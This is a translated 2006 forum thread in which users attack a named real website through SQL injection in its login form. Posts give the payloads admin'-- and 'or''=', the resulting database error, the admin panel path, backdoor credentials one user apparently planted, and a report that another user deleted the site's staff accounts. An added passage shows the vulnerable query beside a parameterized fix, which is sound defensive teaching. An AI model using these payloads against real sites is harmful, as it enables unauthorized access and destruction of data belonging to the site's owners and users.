escalation666, posted December 10, 2006:
http://www.fotoshop.ro that's the target
Why? Because it sends spam.
Vulnerability: SQL injection
PoC: user: admin'--
Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_group
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5)
I'm feeling too lazy these days to try to find out the admin password. Also, if you put 'or''=' as both the user and the password, you'll get a pleasant surprise.

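From the defending side, the error message in the post above shows a login query assembled by pasting form input between quotes. The following is an added example, not code from the thread or from the site: it rebuilds that query shape next to a parameterized version, with SQLite standing in for MySQL and all table contents and function names constructed for illustration.

```python
import sqlite3

# Constructed stand-in for the two tables named in the error message.
# The plaintext password column only mirrors that query; store a salted hash in practice.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE site_user_group (id_user_group INTEGER PRIMARY KEY, level INTEGER);
        CREATE TABLE site_user (id_user INTEGER PRIMARY KEY, id_user_group INTEGER,
            status INTEGER, email TEXT, user_name TEXT, password TEXT);
        INSERT INTO site_user_group VALUES (1, 100);
        INSERT INTO site_user VALUES
            (1, 1, 1, 'admin@example.invalid', 'admin', 'constructed-secret');
    """)
    return db

COLUMNS = ("SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name "
           "FROM site_user u, site_user_group ug ")

def login_concatenated(db, user, password):
    # Vulnerable pattern implied by the error: form input pasted between quotes,
    # so a quote character in the input ends the literal and becomes SQL.
    sql = (COLUMNS + "WHERE u.password='" + password + "' AND u.user_name='" + user
           + "' AND ug.id_user_group = u.id_user_group")
    return db.execute(sql).fetchone()

def login_parameterized(db, user, password):
    # Hardened form: placeholders keep the statement fixed; input is bound as data.
    sql = (COLUMNS + "WHERE u.password = ? AND u.user_name = ? "
           "AND ug.id_user_group = u.id_user_group")
    return db.execute(sql, (password, user)).fetchone()

if __name__ == "__main__":
    db = make_db()
    quoted = "'or''='"  # the input quoted in the post above
    print("concatenated :", login_concatenated(db, quoted, quoted))
    print("parameterized:", login_parameterized(db, quoted, quoted))
    print("valid login  :", login_parameterized(db, "admin", "constructed-secret"))
```

Client-side JavaScript checks on the form do not change this outcome, since the server still receives whatever string is submitted; the fix belongs in how the query is built.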
lordping, posted December 10, 2006:
http://www.fotoshop.ro/admin + the details above ... => access to the admin's password and more

J0K3R, posted December 10, 2006:
escalation666 wrote: Also, if you put 'or''=' as both the user and the password, you'll get a pleasant surprise.
Is that an SQL injection? :?

Guest flama, posted December 10, 2006:
user: kadaj
pass: sugipula
Excuse this password. It's in case the SQL injection stops working for you.

Crhistmas, posted December 10, 2006:
What I knew is that you take the page's source code, strip the java out of it so that you can see what you type in the pass field, and put something like " * or 1+1 -- ", and whatever you want as the user... I don't know if that's correct... if not, correct me. Anyway, thanks.

escalation666 (author), posted December 10, 2006:
gg flama!
christmas... that works too... you probably saw this in a video tutorial. It's useful to do that when the username has to be an email address... and the javascript won't let you enter something like dfdf@fdwfdw.com

Crhistmas, posted December 10, 2006:
Aha, thanks, but is there any program that makes the work easier?

Ras, posted December 10, 2006:
You want there to be a button you press and, done, the site is yours?? :@ :@

devianc3, posted December 10, 2006:
It says the member doesn't exist.. did someone mess with this guy's user? like.. change username?

greeny, posted December 10, 2006:
devianc3 wrote: It says the member doesn't exist.. did someone mess with this guy's user? like.. change username?
I deleted everything that was in the "staff" group from the memberlist. I don't think it's a problem for us, more for the site's owner :@

impure, posted December 10, 2006:
Let me see what's on that site too, to see what's going on.

Guest flama, posted December 11, 2006:
greeny wrote: devianc3 wrote: It says the member doesn't exist.. did someone mess with this guy's user? like.. change username? I deleted everything that was in the "staff" group from the memberlist. I don't think it's a problem for us, more for the site's owner :@
Ugh, all you're set on is destruction, you kids.

Sad_Dreamer, posted December 11, 2006:
How lame... after being spoon-fed the password they go and delete everything too.. pff.. fking kids. If I were in spiry's place I'd ban that guy... those people are partners with share.urbanfriends.us

thelegend, posted December 11, 2006:
Cool stuff. How are you doing, comrade sad dreamer? Do you still remember me? Good luck.

4n4rchyl04d3r, posted December 17, 2006:
...winners don't use copies....